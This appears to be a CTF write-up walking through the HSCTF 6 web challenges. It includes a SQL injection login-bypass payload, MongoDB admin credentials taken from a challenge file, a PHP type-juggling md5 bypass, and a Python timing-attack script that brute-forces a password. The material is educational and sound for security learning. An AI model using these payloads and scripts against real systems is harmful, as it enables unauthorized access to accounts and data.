HSCTF 6 — Web Challenges

6 min readJun 10, 2019

HSCTF 6 is over and i started solving the challenges specifically the web one and completed all of them. This is going to be the walk-through of the challenges. So let’s begin.

1. Inspect Me

We are provided with the link and the flag is in 3 parts. As the name suggests this is all about inspecting i.e. looking onto the source code.

The first part of flag was in the source code of main site.

The second part of flag in style.css

The third part in script.js

That was pretty easy!

2. Agent Keith

This is the second challenge!

We are given with an error and it is based on our user-agent. It means that there is something which has to be done with user-agent! Let’s check the source code!

We can see the user agent for the DEBUG mode. Let’s CURL this and get the flag :))

We got the flag!

3. S-Q-L

This challenge is all about SQL Injection / SQL login bypass. On opening the link we are provided with the login panel.

Lets check if it is vulnerable or not.

It is vulnerable for sure. Let’s bypass this with payload : ‘ or ‘ 1=1

We are done with the challenge!

4. The Quest

This challenge is a quest. On opening the link provided we are presented with the google form!

We need the password of the first challenge. But before we do that we will take a look onto the source code!

The flag is already in the source code :))

5. Keith Logger

We are provided with the file. Let’s download it and see what we can do with it and try the file command on the file.

The file is a google chrome extension. Let’s try to unzip the file.

We have three files now. The content.js file provides us with database information and the other two are not of that much consideration.

On visiting the admin link we got the following information.

Link/Port: keith-logger-mongodb.web.chal.hsctf.com:27017
Password: keithkeithkeith
Role: admin
Database: admin

There are different ways to connect to MongoDB. You can use any client MongoDB Client, robo3t, noSQL client etc. Choice is yours. I will be using robo3t at the moment as i am on windows when writing about this challenge!

On successful connection we can navigate the database and can easily find the flag :))

That’s all. We are done with this challenge :))

6. md5

On opening the link we are provided with the PHP code!

On inspecting the PHP code we can conclude that an md5 of a string is being compared ti it’s own md5! WTH? secondly, in the if statement comparison operator (==) is used instead of strict comparison (===) it means that we can easily bypass with the help of PHP Type Juggling.

I remembered reading a presentation year ago and here is the link of it :)) https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf

I used the Python code used in the same kind of CTF and made some changes according to this case.

Code can be found @ https://github.com/bl4de/ctf/blob/master/2017/HackDatKiwi_CTF_2017/md5games1/md5games1.md

[+] found! md5( 0e251288019 ) ---> 0e874956163641961271069404332409
[+] in 251288020 iterations

Finally we got the flag!

7. Accessible Rich Internet Applications

In this challenge we are provided with the index.html file. Let’s download this file and grab the password!

We got this search bar. Let’s check the source code!

We can see junk data which does not really makes any sense. Well on trying the developer tools the source code starts to make sense.

We can see that on every user input randomly options are selected from the list so it actually don’t care about whatever we enter ;)

Let’s replace the file with the code which makes some sense and create a python script to automate the task!

from bs4 import BeautifulSoup

with open("index.html") as tx:
    soup = BeautifulSoup(tx,"html.parser")

dig= []

for item in soup.find_all('div', {'role':"option"}):
    dig.append(int(item['aria-posinset']))

print(len(dig))

The second script!

def binary2ascii(s):
    return ''.join(chr(int(s[i*8:i*8+8],2)) for i in range(len(s)//8))

with open("index.html") as tx:
    soup = BeautifulSoup(tx,"html.parser")

a=0
flag=[]

for i in range(0,1040):
    flag.append(soup.find('div',{'aria-posinset':str(i)}).contents[0])
    a+=1
    if a%8==0:
        print(binary2ascii("".join(flag)),end='')
        flag.clear()

& we got the flag: flag{accessibility_is_crucial}

8. Networked Password

This challenge is a time based and we need to automate the process in order to grab the password as it is networked :))

import requests
import string

link = 'https://networked-password.web.chal.hsctf.com'
charset = string.letters + string.digits + string.punctuation
# print charset
flag = "hsctf{"
resp = 0
char = ""

while flag[-1] != "}":
    for i in charset:
        payload = {"password":flag + i}
        r = requests.post(link, data = payload)
        if r.elapsed.total_seconds() > resp:
            resp = r.elapsed.total_seconds()
            char = i
    flag += char
    resp = 0
    print "[+] Current Flag: " + flag

We are provided with the flag!

[+] Flag: hsctf{s
[+] Flag: hsctf{sm
[+] Flag: hsctf{sm0
[+] Flag: hsctf{sm0l
[+] Flag: hsctf{sm0l_
[+] Flag: hsctf{sm0l_f
[+] Flag: hsctf{sm0l_fl
[+] Flag: hsctf{sm0l_fl4
[+] Flag: hsctf{sm0l_fl4g
[+] Flag: hsctf{sm0l_fl4g}

That’s all for the web challenges! i will be sharing the solutions of other categories as well ;))